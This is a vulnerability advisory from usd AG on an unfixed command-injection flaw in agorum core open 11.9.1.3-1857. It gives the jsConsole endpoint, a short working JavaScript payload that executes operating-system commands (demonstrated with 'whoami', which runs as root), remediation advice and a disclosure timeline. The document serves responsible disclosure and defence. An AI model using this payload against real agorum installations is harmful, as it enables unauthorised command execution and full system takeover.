usd-2025-0021 | Agorum core open 11.9.1.3-1857 - Remote Code Execution

Product: Agorum core open
Affected Version: 11.9.1.3-1857
Vulnerability Type: Improper Neutralization of Special Elements used in a Command (Command Injection) (CWE-77)
Security Risk: Critical
Vendor: Agorum
Vendor URL: https://www.agorum.com/
Vendor acknowledged vulnerability: No
Vendor Status: Not fixed
CVE Number: Not requested
CVE Link: Not requested
Advisory ID: usd-2025-0021

Description

​agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.

Proof of Concept

An administrative user can make use of a module called jsConsole, which allows the execution of arbitrary commands at the operating system level.

The jsConsole is accessible through the following endpoint. /roiwebui/home_module/container/?parent=root&id=root.0&module=Home&brick=ScriptEditor&config={isAdmin%3Atrue%2CisConsoleOnly%3Atrue}

The following payload can be used within the console to execute the whoami command.

var runCommand = function(cmd) {
var runtime = java.lang.Runtime.getRuntime();
var process = runtime.exec(cmd);
var reader = new java.io.BufferedReader(
new java.io.InputStreamReader(process.getInputStream())
);
var line;
var output = "";
while ((line = reader.readLine()) != null) {
output += line + "\n";
}
reader.close();
process.waitFor();
return output;
};
runCommand("whoami");

The following screenshot shows the command execution, revealing that the service is running as the root user, which grants full control over the system to an attacker.

Fix


First, all user inputs within jsConsole must be strictly validated and sanitized. Only a predefined set of safe commands should be allowed, and any inputs containing potentially dangerous characters must be rejected or properly escaped.

Additionally, a whitelist approach should be implemented, permitting only specific and necessary commands to be executed. Allowing arbitrary command execution should be avoided entirely.

It is also crucial to configure the service to run with the least privileges possible. Instead of operating as the root user, the service should run under a dedicated low-privileged account, which significantly reduces the potential impact of any successful exploitation.

If jsConsole is not absolutely required, the functionality should either be disabled or access should be heavily restricted.

References

Timeline

  • 2025-05-05: First contact request via mail.
  • 2025-05-05: The vendor has received our finding and began triage.
  • 2025-05-07: The vendor has begun addressing and fixing the issue.
  • 2025-05-27: The vendor has not confirmed this vulnerability, as it pertains to a system-relevant function.
  • 2025-06-27: This advisory is published.

Credits

This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.